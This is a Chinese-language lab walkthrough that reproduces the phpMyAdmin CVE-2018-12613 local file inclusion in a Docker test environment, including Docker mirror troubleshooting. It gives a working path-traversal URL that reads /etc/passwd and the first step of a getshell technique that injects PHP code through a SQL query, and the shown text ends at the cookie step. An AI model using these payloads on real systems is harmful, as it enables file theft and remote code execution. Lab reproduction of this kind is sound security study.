目录
一.phpmyadmin(CVE-2018-12613)
漏洞背景:phpmyadmin是一个用php写的,管理MySQL数据库的Web页面工具,它使用广泛,是很多建站平台的数据库管理后台,但在某些版本中target参数对路径拼接不严,可以造成本地文件包含漏洞,读取敏感文件,从而进一步控制系统
1.搭建环境
step1:进入到对应漏洞的目录之后,启动环境
sudo docker-compose up -d
ERROR:说明Docker 客户端尝试从 Docker Hub 拉取镜像(mysql:5.5
)时超时了,原因通常是网络连接问题。
解决:
1)编辑/etc/docker/daemon.json,添加镜像加速地址
sudo mkdir -p /etc/docker
vi /etc/docker/daemon.json
{
"registry-mirrors": [
"https://docker.sunzishaokao.com",
"https://docker.1ms.run",
"https://docker.1panel.live",
"https://docker.anyhub.us.kg"
]
}
2)进行加载并重启docker
systemctl daemon-reload
systemctl restart docker
3)尝试:解决
step2:访问http://your-ip:8080
使用ifconfig查询本机的ip地址(eth0),然后访问上述网站进入漏洞环境
step3:结束后不要忘了关闭环境
docker-compose down
2.漏洞复现
目标一:读取/etc/passwd
http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../etc/passwd
成功读取目标文件
目标二:get shell,拿到执行权限
step1:在SQL查询页面上执行以下命令
select '<?php echo `ls` ?>';
然后在inspect的storage里找到cookie值